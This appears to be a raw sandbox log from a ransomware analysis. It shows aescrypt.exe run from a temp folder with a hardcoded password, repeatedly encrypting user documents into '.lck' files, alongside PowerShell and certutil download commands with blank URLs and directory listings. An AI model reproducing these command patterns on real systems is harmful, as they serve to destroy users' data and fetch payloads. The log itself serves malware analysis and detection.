C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck.lck.lck" "SaveWatch.vsw.lck.lck.lck"
3⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck" "ResumeClose.pptx"
3⤵
PID:440

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck" "ResumeClose.pptx.lck"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck.lck" "ResumeClose.pptx.lck.lck"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck.lck.lck" "ResumeClose.pptx.lck.lck.lck"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck" "UninstallGet.xls"
3⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck" "UninstallGet.xls.lck"
3⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck.lck" "UninstallGet.xls.lck.lck"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck.lck.lck" "UninstallGet.xls.lck.lck.lck"
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck" "MoveComplete.vdx"
3⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck" "MoveComplete.vdx.lck"
3⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck.lck" "MoveComplete.vdx.lck.lck"
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck.lck.lck" "MoveComplete.vdx.lck.lck.lck"
3⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck" "CloseRevoke.xls"
3⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck" "CloseRevoke.xls.lck"
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck.lck" "CloseRevoke.xls.lck.lck"
3⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck.lck.lck" "CloseRevoke.xls.lck.lck.lck"
3⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck" "ApproveWrite.vsw"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck" "ApproveWrite.vsw.lck"
3⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck.lck" "ApproveWrite.vsw.lck.lck"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck.lck.lck" "ApproveWrite.vsw.lck.lck.lck"
3⤵
PID:972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck" "SendRedo.pub"
3⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck" "SendRedo.pub.lck"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck.lck" "SendRedo.pub.lck.lck"
3⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck.lck.lck" "SendRedo.pub.lck.lck.lck"
3⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck" "StepConnect.xlt"
3⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck" "StepConnect.xlt.lck"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck.lck" "StepConnect.xlt.lck.lck"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck.lck.lck" "StepConnect.xlt.lck.lck.lck"
3⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck" "EditPop.ppt"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck" "EditPop.ppt.lck"
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck.lck" "EditPop.ppt.lck.lck"
3⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck.lck.lck" "EditPop.ppt.lck.lck.lck"
3⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck" "DisableUnlock.ppsm"
3⤵
PID:440

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck" "DisableUnlock.ppsm.lck"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck.lck" "DisableUnlock.ppsm.lck.lck"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck.lck.lck" "DisableUnlock.ppsm.lck.lck.lck"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck" "ReceiveAssert.vstm"
3⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck" "ReceiveAssert.vstm.lck"
3⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck.lck" "ReceiveAssert.vstm.lck.lck"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck.lck.lck" "ReceiveAssert.vstm.lck.lck.lck"
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck" "ProtectSkip.xls"
3⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck" "ProtectSkip.xls.lck"
3⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck.lck" "ProtectSkip.xls.lck.lck"
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck.lck.lck" "ProtectSkip.xls.lck.lck.lck"
3⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck" "ApproveLimit.vsdx"
3⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck" "ApproveLimit.vsdx.lck"
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck.lck" "ApproveLimit.vsdx.lck.lck"
3⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck.lck.lck" "ApproveLimit.vsdx.lck.lck.lck"
3⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck" "UnlockOptimize.htm"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck" "UnlockOptimize.htm.lck"
3⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck.lck" "UnlockOptimize.htm.lck.lck"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck.lck.lck" "UnlockOptimize.htm.lck.lck.lck"
3⤵
PID:972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck" "SearchInstall.odp"
3⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck" "SearchInstall.odp.lck"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck.lck" "SearchInstall.odp.lck.lck"
3⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck.lck.lck" "SearchInstall.odp.lck.lck.lck"
3⤵
PID:1276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:520

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RepairUndo.shtml.lck" "RepairUndo.shtml"
3⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DebugReceive.ocx.lck" "DebugReceive.ocx"
3⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CopySelect.zip.lck" "CopySelect.zip"
3⤵
PID:884

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "AddUnpublish.xhtml.lck" "AddUnpublish.xhtml"
3⤵
PID:232

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RedoRepair.mpeg.lck" "RedoRepair.mpeg"
3⤵
PID:892

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RevokeUnprotect.xlt.lck" "RevokeUnprotect.xlt"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MountRead.xltm.lck" "MountRead.xltm"
3⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DebugUnregister.vsdx.lck" "DebugUnregister.vsdx"
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendTest.jpg.lck" "SendTest.jpg"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallOut.dotm.lck" "UninstallOut.dotm"
3⤵
PID:816

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FormatPush.tif.lck" "FormatPush.tif"
3⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchPush.mht.lck" "SwitchPush.mht"
3⤵
PID:296

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PushConvert.mp4.lck" "PushConvert.mp4"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UseInitialize.bat.lck" "UseInitialize.bat"
3⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeFormat.mpg.lck" "InvokeFormat.mpg"
3⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeFormat.ogg.lck" "ResumeFormat.ogg"
3⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UseUninstall.ttf.lck" "UseUninstall.ttf"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BlockEnable.mov.lck" "BlockEnable.mov"
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeOptimize.xps.lck" "ResumeOptimize.xps"
3⤵
PID:1916

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchUnregister.svg.lck" "WatchUnregister.svg"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExitUnregister.scf.lck" "ExitUnregister.scf"
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResetPush.svgz.lck" "ResetPush.svgz"
3⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EnterJoin.tiff.lck" "EnterJoin.tiff"
3⤵
PID:2004

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DenyUndo.pdf.lck" "DenyUndo.pdf"
3⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishResume.xht.lck" "PublishResume.xht"
3⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MeasureImport.contact.lck" "MeasureImport.contact"
3⤵
PID:788

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "GroupDismount.ini.lck" "GroupDismount.ini"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CopyRestore.ex_.lck" "CopyRestore.ex_"
3⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WaitResume.3gp.lck" "WaitResume.3gp"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeConfirm.eprtx.lck" "ResumeConfirm.eprtx"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DebugSync.xlsm.lck" "DebugSync.xlsm"
3⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SetSync.hta.lck" "SetSync.hta"
3⤵
PID:944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:1224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1176

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
